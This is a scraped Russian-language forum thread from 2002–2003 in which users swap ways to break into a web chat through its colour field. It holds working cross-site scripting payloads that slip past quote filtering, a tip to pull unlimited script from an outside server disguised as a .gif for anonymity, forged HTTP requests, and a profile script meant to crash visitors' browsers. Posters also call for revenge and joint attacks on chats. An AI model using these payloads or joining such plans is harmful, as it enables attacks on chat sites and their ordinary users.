</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 05 2002,17:16)</td></tr><tr><td id="QUOTE">Предыдущее общение можно стереть (я дурак)... Вопросик, хочу написать скарипт посложнее... Вот такой вот работает (через цвет): цвет="background-image:url(javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+';'+'alert()'+unescape('%3C')+'/script'+unescape('%3E') ))"" В чате он превращается в color:;background-image:url(javascript:document.write(unescape(&#39;%3C&#39+&#39;script&#39;+unescape(&#39;%3E&#39+&#39;alert()&#39;+&#39;;&#39;+&#39;alert()&#39;+unescape(&#39;%3C&#39+&#39;/script&#39;+unescape(&#39;%3E&#39 )); Но все равно работает. Но вот когда я забиваю внутрь alert что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &#39) и скрипт не испольняется. Как быть не подскажите?[/QUOTE]<span id='postcolor'> можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:54)</td></tr><tr><td id="QUOTE">странно а пачиму у меня не пашет с ', а только с ", может руки кривые?[/QUOTE]<span id='postcolor'> Нужно писать не ' а `
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:59)</td></tr><tr><td id="QUOTE">можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????[/QUOTE]<span id='postcolor'> По моему там пропускается больше символов. Но в принципе, если поле обрезает длинну скрипта, то все равно можно вставить скрипт неограниченной длинны. Например вставив такой скрипт: document.write('< script src="http://myServer/a.js"></script>') А в файл a.js можно засунуть скрипт любой длинны. Тут еще могу сказать следующее: если тег требует закрывающего, например < script></script>, то такую запись можно сократить до такого вида < script/>. Эти два вида записи эквивалентны, но вторая существенно короче. Таким образов первый пример можно еще сократить до такого: document.write('< script src="http://myServer/a.js"/>')
Насчет .js я только хотел написать... а ты меня опередил. До этого я и сам додумался! Гы-гы-гы. Сейчас разрабатываю соотв код. Вот только одна загвоздка - как бы вместо фоток (в профиле пользователя). Точнее в тот же каталог сунуть *.js . Может это просто? Это желательно что бы не подгружать *.js из другого сайта (что бы не было подозрительно). Вот было бы здорово! К сожаление js вместо jpg подсунуть не получается - скрипты закачки сами размер меняют... и портят. Зато #60;script src="http://www.xnjnj.ru/kill.js"> можно поменять на #60;script src="http://www.xnjnj.ru/smile.gif"> (и переименовать соотв js на сайте-базе). Работать будет (это я для пущей анаонимности). Algol, а как ты сохранил фрейм? Я так и не понял. Использую Proxomitron (firewall оригинальный), который "на лету" меняет html-ки. Вот так вот обошел необходимость менять вид фрейма (для подстановки цветов).
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,13:57)</td></tr><tr><td id="QUOTE">Algol, а как ты сохранил фрейм?[/QUOTE]<span id='postcolor'> Еще раз говорю: я не сохраняю фреймы, я подделываю HTTP запросы
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Нужно писать не ' а ` [/QUOTE]<span id='postcolor'> я делал через копипейст, ошибиться не мог
"Я подделываю http-запросы". Понял.. Оказывается Proxomitron похоже умеет тоже самое делать... попробую. В принципе тут видимо нужно перехватывать метод POST и все...
Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'> Быть такого не может ... Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 07 2002,11:30)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'> Быть такого не может ... Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...[/QUOTE]<span id='postcolor'> Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.!
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 07 2002,17:24)</td></tr><tr><td id="QUOTE">Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.![/QUOTE]<span id='postcolor'> Дык после посылки сообщения, сервер присылает тебе форму заново, и там уже нет javascript
Посидел почитал - довольно интересно Хотелось бы возназить автору этой темы Если все именно так как ты говоришь , то тебя не выкидували скорее всего выкинули IP сетку с которой ты сидел поэтому пострадал и ты и еще Адмиы там вполне нормальные люди, низакем они не подсматривают и личных интресов не преследуют. Если и говорят пра нихз плохое то это здые языки большенств чатлан относятся к админам с уважением!! Так что зря вы батенька бочку катите !!!! в себе разберитесь
Эй братан, тебя тоже швыранули? Ха-ХА- да мы по одну сторону барекад! Вобщем вот что у меня срабатывало! Пишем при регистрации, в инфе пользователя! #60;script language="JavaScript1.2">window.location="file:///c:/nul/nul";</script> Затем приглашаем Посмотреть НАнАС, мотивирую это самыми защренными предлогами , как только ламер 9* пошел на нас глядеть, маши ему ручкой! С уважением НАЕМНИК PS Зачем чат ломать, надо узел УБИТЬ! Как говорится пусть АДМИН САМ ОБОСРАННУЮ МАЛИНУ ЕСТ! Если собиретесь мстить, я с вами пишите !
решил тоже написать! не сочтите меня шестёркой, но если соберётесь напасть на какой-то чат совместно - позовите меня и вообще, пора устраивать еженедельное собрание, где будет вестить обсуждение того, "на какой чат нападать сегодня" понимаете куда я клоню? если чел, пишет сюда прося помощи, значит его вынудили... а большинство админов на чатах, это люди, кторые получив в свои гадкие лапки маленькую власть, постепенно начинают наглеть, и показывают почти любому юзеру - кто здесь хозяин. конечно можно сказать - не нравится, ходи на др. чат. но на это нужно ответить - на диких просторах инета, побеждает тот, кто сильнее собакам - собачья смерть
Бухой Дамбер-ТЫ дело говоришь! "ТЯЖЕЛО В УЧЕНИИ ЛЕГКО В БОЮ!" Ставлю этой теме в форуме 90 балов по 100 баловой шкале! А на счет того что кото там пиз-дит, типа просто подсетку выкинули, это вы уроды комунибудь другому на уши повесте! На кой )(УЙ вам понадобилось под сеть вырезать? Я так понял это один из админов с www.farit.ru был, так вот что я тебе скажу админ: Когда я свой первыйскрипт написал, ты еще мутной каплей между ног болтался! СЫНОК! Ты подписал свой узел! ..!НаемНИК!..
вот это да... хм... серьёзные дела... я вот... это... про нетмаску... ведь тот админ(если это админ) может и прав в чате, где я иногда сижу(и во многих др.)... ммм... если банят чела, то банят маску, т.е. с определённого прова зайти не удастся. только не могу скзать, какой всё таки диапазон (насколько он широк). поэтому нужно менять ip, напр. используя прокси(конечно анонимный, а какой смысл здесь писать про обычный?). НО, бан маски, не означает выкидывание кого-то с чата. так? просто нельзя будет войти в чат, с определённого диапазона ip. я прав? а пока чела не кикнули - он может цатицца! или я не прав? а вот про скрипты... вирусы... я не могу что-либо сказать. думаю, что админы это могут творить в наказание(им, видно показалось, что бана не достаточно) конечно, не стоит исключать вероятность того, что просто какой-то чувак, решил порикаловаться... и смог атаковать скриптами. но есть подозрение, что такое мог провернуть только чувак, имеющий реальные права на данном чате(читай админ). кстати, я так и не понял, что с автором данной темы произошло, когда на него спусти скрипты(иль чаво тама ещё)?
Кстати насчет того чтобы всем вместе нападать на чат, это мысль! З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?!
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (ДjavaЛИЦА @ марта 07 2003,01:48)</td></tr><tr><td id="QUOTE">З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?![/QUOTE]<span id='postcolor'> www.gamecenter.krovatka.ru, но ето было давно и неправда, я тогда ещё хтмл не знал....
